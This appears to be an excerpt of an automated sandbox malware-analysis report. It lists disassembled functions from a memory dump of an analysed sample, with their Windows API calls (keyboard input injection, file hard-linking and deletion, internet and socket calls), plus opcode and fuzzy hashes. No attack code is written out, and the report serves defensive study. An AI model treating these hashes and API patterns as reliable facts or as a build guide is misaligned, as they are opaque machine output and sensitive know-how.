                                                                                                                                                                                      • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                                                                                      • Instruction ID: c505c235f7adb64254bf181b1e2719c2c9a4fa8f1e69d18988dde41fa2c8552d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4151C430A00325DBDF24DFA9E9807AE77F9AF40360F248729F875962E8D7749D519B40
                                                                                                                                                                                      Function 0096C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0096C354
                                                                                                                                                                                      • ScreenToClient.USER32(?,00000002), ref: 0096C384
                                                                                                                                                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0096C3EA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                      • Opcode ID: 0632ee5921679830ccbaf1a23d239e465031cf2ff5392d8b920114ab0c833ad2
                                                                                                                                                                                      • Instruction ID: 99e296880a3f06dba6e111e7fa5449d246d36611f18e90eaeb5b661630e7fb91
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0632ee5921679830ccbaf1a23d239e465031cf2ff5392d8b920114ab0c833ad2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 42511CB1A00209EFDF20DF68C880EBE7BAAFB45360F248559F9559B291D770ED41DB90
                                                                                                                                                                                      Function 0093D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0093D258
                                                                                                                                                                                      • __itow.LIBCMT ref: 0093D292
                                                                                                                                                                                        • Part of subcall function 0093D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0093D549
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0093D2FB
                                                                                                                                                                                      • __itow.LIBCMT ref: 0093D350
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3379773720-0
                                                                                                                                                                                      • Opcode ID: 176d3e4605751ab2478bd64843a659bdc983030da4dc8e74f1b0a97ae5ff1a45
                                                                                                                                                                                      • Instruction ID: 4d7a274238a31424d7d048f0968fb93a367d1a1fa75f74b0f77042dcfea498ef
                                                                                                                                                                                      • Opcode Fuzzy Hash: 176d3e4605751ab2478bd64843a659bdc983030da4dc8e74f1b0a97ae5ff1a45
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11419071A01209AFDF11EF94D852BEF7BB9AF88710F000019FA15A32D1DB749E45CB62
                                                                                                                                                                                      Function 0094EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0094EF32
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0094EF58
                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0094EF7D
                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0094EFA9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                      • Opcode ID: f14fd799aff2963067eaef3eb2570de65bbd3e69a94bd6c7db4d82d96ba375c8
                                                                                                                                                                                      • Instruction ID: 57980ccf7d6e4e52751b570c89ce337949728913b8971b5c94f9e9e14e204214
                                                                                                                                                                                      • Opcode Fuzzy Hash: f14fd799aff2963067eaef3eb2570de65bbd3e69a94bd6c7db4d82d96ba375c8
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9410839700611DFCB11EF15C595E5ABBE6BF99320B198098E846AF3A2CB34FD40DB91
                                                                                                                                                                                      Function 0096B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0096B3E1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                      • Opcode ID: 5a1cc5b3705fef84e2215fe47c54895d4a1b5a1ce12aa6bb06da3e16dfb122c3
                                                                                                                                                                                      • Instruction ID: fc21a1e93aee4c25a619b758e89410d70554b1500b6514526f81e911fdb921f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a1cc5b3705fef84e2215fe47c54895d4a1b5a1ce12aa6bb06da3e16dfb122c3
                                                                                                                                                                                      • Instruction Fuzzy Hash: D231DE35615208EBEB249F18CC85FAC3769AB06390F608512FA51D62F2FB30E8C0AB51
                                                                                                                                                                                      Function 0096D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0096D617
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0096D68D
                                                                                                                                                                                      • PtInRect.USER32(?,?,0096EB2C), ref: 0096D69D
                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 0096D70E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                      • Opcode ID: 50165b4f2839aa32dd83272548adc5c0bdfe00185d163a2f82f7bec18795026c
                                                                                                                                                                                      • Instruction ID: a76959bbe38e4a53a656c3c265aa962a6b75906fcc041de9f8f3bf5ebeccc93b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 50165b4f2839aa32dd83272548adc5c0bdfe00185d163a2f82f7bec18795026c
                                                                                                                                                                                      • Instruction Fuzzy Hash: A4418B70F0A119DFCB11CF58D894FA97BF5BB4A344F1881AAE4299B291D730E841DB90
                                                                                                                                                                                      Function 00944497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009444EE
                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 0094450A
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0094456A
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009445C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                      • Opcode ID: 296bbdf1e1d8ed0d965f01a4447e531f25eb877b41a2351dcce1cd62e78eac0d
                                                                                                                                                                                      • Instruction ID: 9a77d87f71582a7d47fcfca0c3c864665eee8ae99a604e183aa8d8d3953b7e46
                                                                                                                                                                                      • Opcode Fuzzy Hash: 296bbdf1e1d8ed0d965f01a4447e531f25eb877b41a2351dcce1cd62e78eac0d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 37312471A042586FFF349B649818FFEBBB99B89314F04026AF0C2932C1C7789E44DB61
                                                                                                                                                                                      Function 00934DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00934DE8
                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00934E16
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00934E44
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00934E7A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                      • Opcode ID: 97dedfb3d9be46611885f2470b695313afc0215482d3e403d04829ea13405424
                                                                                                                                                                                      • Instruction ID: afdfaed5b9ec11853fa02b76b4262647900c568eae921b541f45469e31c6188a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 97dedfb3d9be46611885f2470b695313afc0215482d3e403d04829ea13405424
                                                                                                                                                                                      • Instruction Fuzzy Hash: DD318931604256AFDF219F75CC45BAA7BAABF41710F168929E8618B1E0E730F891DF90
                                                                                                                                                                                      Function 00967AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00967AB6
                                                                                                                                                                                        • Part of subcall function 009469C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 009469E3
                                                                                                                                                                                        • Part of subcall function 009469C9: GetCurrentThreadId.KERNEL32 ref: 009469EA
                                                                                                                                                                                        • Part of subcall function 009469C9: AttachThreadInput.USER32(00000000,?,00948127), ref: 009469F1
                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 00967AC7
                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00967B00
                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00967B06
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                      • Opcode ID: 5a6ce24964b8faa376e98d65b79fb17a564b3c3c9b712020fb4060a67fc28be1
                                                                                                                                                                                      • Instruction ID: ca7e2d25944ccba8990de1ac1cb44e3b38ec6f58f174ea410382ea72fc65d03c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a6ce24964b8faa376e98d65b79fb17a564b3c3c9b712020fb4060a67fc28be1
                                                                                                                                                                                      • Instruction Fuzzy Hash: B3311E75E00108AFCB00EFB5D8859EFBBF9EF98314B50846AF815E3251D6359E458BA0
                                                                                                                                                                                      Function 0096EFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0096EFE2
                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0097F3C3,?,?,?,?,?), ref: 0096EFF7
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0096F041
                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0097F3C3,?,?,?), ref: 0096F077
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                      • Opcode ID: 9be4cffb445f5b7f811cdfeebbf494a0aa62971792bb74273d39da67cafc036e
                                                                                                                                                                                      • Instruction ID: cff0c247e4b2eb9d25ba0c53685644c943650e39deddc316e3cc8998c580c536
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9be4cffb445f5b7f811cdfeebbf494a0aa62971792bb74273d39da67cafc036e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19210035600018FFCB258F58E8A9EEA7BB9FF4A710F044069F905873A2C3319D51EBA0
                                                                                                                                                                                      Function 0095497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009549B7
                                                                                                                                                                                        • Part of subcall function 00954A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00954A60
                                                                                                                                                                                        • Part of subcall function 00954A41: InternetCloseHandle.WININET(00000000), ref: 00954AFD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1463438336-0
                                                                                                                                                                                      • Opcode ID: b8fd457fa3454ba3ee2bf3e12b7ee7d457526fc699b247f45f31d34dbc0d6c74
                                                                                                                                                                                      • Instruction ID: ac2dce4ea3a0a12c75e9c52633770b8f274215a02c6d6e7e7129d8cc4c2ef32a
                                                                                                                                                                                      • Opcode Fuzzy Hash: b8fd457fa3454ba3ee2bf3e12b7ee7d457526fc699b247f45f31d34dbc0d6c74
                                                                                                                                                                                      • Instruction Fuzzy Hash: 34210471244A05BFDB51DF61CC01FBBB7ADFB88706F10400AFE0186250EB319858AB94
                                                                                                                                                                                      Function 00968834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 009688A3
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009688BD
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009688CB
                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009688D9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                      • Opcode ID: 0494cee0c2f5ca58a7f110e9f3aff995ceb08ac5537958e5ffcc6fba53d7d412
                                                                                                                                                                                      • Instruction ID: 26efab52e8ed4de87c8568f35f11f10eb09bff249532318b45a48d029fdf027b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0494cee0c2f5ca58a7f110e9f3aff995ceb08ac5537958e5ffcc6fba53d7d412
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30116031345514AFDB14AB28CC55FAB7BAAEF85320F144219F926CB3E2CB74AC00DB94
                                                                                                                                                                                      Function 0095900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0095906D
                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0095907F
                                                                                                                                                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 0095908C
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 009590A3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 385091864-0
                                                                                                                                                                                      • Opcode ID: b548e6de2f95558c21d07c6132d41146d6992f5fed99aa0fddfac31f110e0789
                                                                                                                                                                                      • Instruction ID: 51423bf24f7a30e84f40cd44e02af97f5a6b43d0505627d6418126b1ce647079
                                                                                                                                                                                      • Opcode Fuzzy Hash: b548e6de2f95558c21d07c6132d41146d6992f5fed99aa0fddfac31f110e0789
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15218176A011249FDB10DF69C885A9ABBFCEF89710F00816AF849D7290DA74DA85CB90
                                                                                                                                                                                      Function 009418E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00942CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009418FD,?,?,?,009426BC,00000000,000000EF,00000119,?,?), ref: 00942CB9
                                                                                                                                                                                        • Part of subcall function 00942CAA: lstrcpyW.KERNEL32(00000000,?,?,009418FD,?,?,?,009426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00942CDF
                                                                                                                                                                                        • Part of subcall function 00942CAA: lstrcmpiW.KERNEL32(00000000,?,009418FD,?,?,?,009426BC,00000000,000000EF,00000119,?,?), ref: 00942D10
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00941916
                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,009426BC,00000000,000000EF,00000119,?,?,00000000), ref: 0094193C
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,009426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00941970
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
